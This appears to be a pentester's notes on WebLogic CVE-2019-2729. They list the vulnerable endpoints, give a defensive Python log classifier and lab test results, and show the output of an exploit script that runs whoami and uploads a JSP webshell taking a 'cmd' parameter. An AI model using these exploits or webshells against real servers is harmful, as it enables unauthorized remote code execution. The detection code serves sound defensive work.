# WebLogic — CVE-2019-2729

Oracle WebLogic Server is affected by a remote code execution vulnerability in the wls-wsat.war and wls9_async_response.war packages due to unsafe deserialization of Java objects. A remote, unauthenticated attacker can exploit the issue by sending a crafted Java serialized object in an HTTP request to execute arbitrary Java code in the context of the web server.

Exploiting wls-wsat.war returns command output, while wls9_async_response.war is blind.

Affected versions: 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0
## Vulnerable endpoints

### wls-wsat.war (cmd response)
- /wls-wsat/CoordinatorPortType
- /wls-wsat/RegistrationPortTypeRPC
- /wls-wsat/ParticipantPortType
- /wls-wsat/RegistrationRequesterPortType
- /wls-wsat/CoordinatorPortType11
- /wls-wsat/RegistrationPortTypeRPC11
- /wls-wsat/ParticipantPortType11
- /wls-wsat/RegistrationRequesterPortType11
### wls9_async_response.war (blind)
- /_async/AsyncResponseService
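From the defender's side, the endpoint list above is also the detection surface: a POST to any of these paths from the outside is worth an alert, and the `/_async/<name>.jsp?cmd=` URL shown later under Scripts is the post-exploitation indicator. The following is an added example, not part of the original notes or of rootedshell's scripts, that classifies access-log lines against those indicators. It assumes the log is written in NCSA common/combined format (a configurable WebLogic option; adjust the regex for other layouts) and uses constructed sample lines, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Deserialization endpoints listed on this page. Path matching below is
# case-insensitive so a request with altered letter case is still flagged.
WLS_WSAT_ENDPOINTS = {
    "/wls-wsat/CoordinatorPortType",
    "/wls-wsat/RegistrationPortTypeRPC",
    "/wls-wsat/ParticipantPortType",
    "/wls-wsat/RegistrationRequesterPortType",
    "/wls-wsat/CoordinatorPortType11",
    "/wls-wsat/RegistrationPortTypeRPC11",
    "/wls-wsat/ParticipantPortType11",
    "/wls-wsat/RegistrationRequesterPortType11",
}
ASYNC_ENDPOINTS = {"/_async/AsyncResponseService"}

_WSAT = {p.lower() for p in WLS_WSAT_ENDPOINTS}
_ASYNC = {p.lower() for p in ASYNC_ENDPOINTS}

# Assumption: NCSA common/combined access-log layout:
#   client ident user [timestamp] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+'
)


def classify(line):
    """Return (rule, client_ip, path) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = parts.path.lower()
    # keep_blank_values so an empty "?cmd=" probe is still seen as a cmd parameter
    query = parse_qs(parts.query, keep_blank_values=True)

    if m["method"] == "POST" and path in _WSAT:
        return ("cve-2019-2729-wls-wsat", m["ip"], parts.path)
    if m["method"] == "POST" and path in _ASYNC:
        return ("cve-2019-2729-async-blind", m["ip"], parts.path)
    # Post-exploitation indicator: a JSP dropped under /_async/ taking a cmd parameter
    if path.startswith("/_async/") and path.endswith(".jsp") and "cmd" in query:
        return ("webshell-cmd-exec", m["ip"], parts.path)
    return None


def scan(lines):
    """Run classify() over an iterable of log lines and keep the hits."""
    return [hit for hit in (classify(line) for line in lines) if hit]


# Constructed sample log lines (not captured traffic); IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Jul/2019:12:00:01 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1024',
    '203.0.113.9 - - [10/Jul/2019:12:00:02 +0000] "POST /_async/AsyncResponseService HTTP/1.1" 202 0',
    '203.0.113.9 - - [10/Jul/2019:12:00:05 +0000] "GET /_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami HTTP/1.1" 200 12',
    '198.51.100.4 - - [10/Jul/2019:12:01:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 5000',
    '198.51.100.4 - - [10/Jul/2019:12:01:03 +0000] "GET /wls-wsat/CoordinatorPortType?wsdl HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for rule, ip, path in scan(SAMPLE_LOG):
        print(f"{rule}\t{ip}\t{path}")
```

A GET for `?wsdl` on a wls-wsat path is deliberately not flagged, since WSDL retrieval is normal client behaviour; only POSTs (the method the SOAP sinks accept) trigger the CVE rules. On an unpatched server the cheapest mitigation remains removing or access-restricting wls-wsat.war and wls9_async_response.war, which also makes any POST hit on these paths an unambiguous signal.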
## Test data
| Version | Image | Result | Reason |
|---|---|---|---|
| 10.3.6.0 | VulnHub 10.3.6.0-2017 | Vulnerable | wls-wsat deserialization |
| 12.2.1.3 | VulnHub 12.2.1.3-2018 | Not vulnerable | Endpoints missing |
| 12.2.1.3 | VulnHub 12.2.1.3 | Not vulnerable | Endpoints missing |
| 12.2.1.3 | weblogic:12.2.1.3 | Inconclusive | "Old format work area header is disabled." |
## Scripts

`weblogic_get_webshell.py` (by rootedshell) runs three payloads against the target at once.
```
» python3 weblogic_get_webshell.py http://127.0.0.1:7003
--- payload2.txt (weblogic 10.3.6) ---
http://127.0.0.1:7003/wls-wsat/CoordinatorPortType
whoami :
root
--- payload.txt, uploading webshell '.s8Jn4WlqX2c592.jsp' ---
http://127.0.0.1:7003/_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami
Cookie:JSESSIONID=DxZLnCLX1y5BPn1Yw9GrpYVFR0NQQhyrk1qFXsQ1Pz2qQbW1lyKR!903277329; path=/; HttpOnly
whoami:
root
```

A modified version of rootedshell's script uploads webshells and enables direct command execution via the /_async/ endpoint; it is available in the weblogic_webshell repository.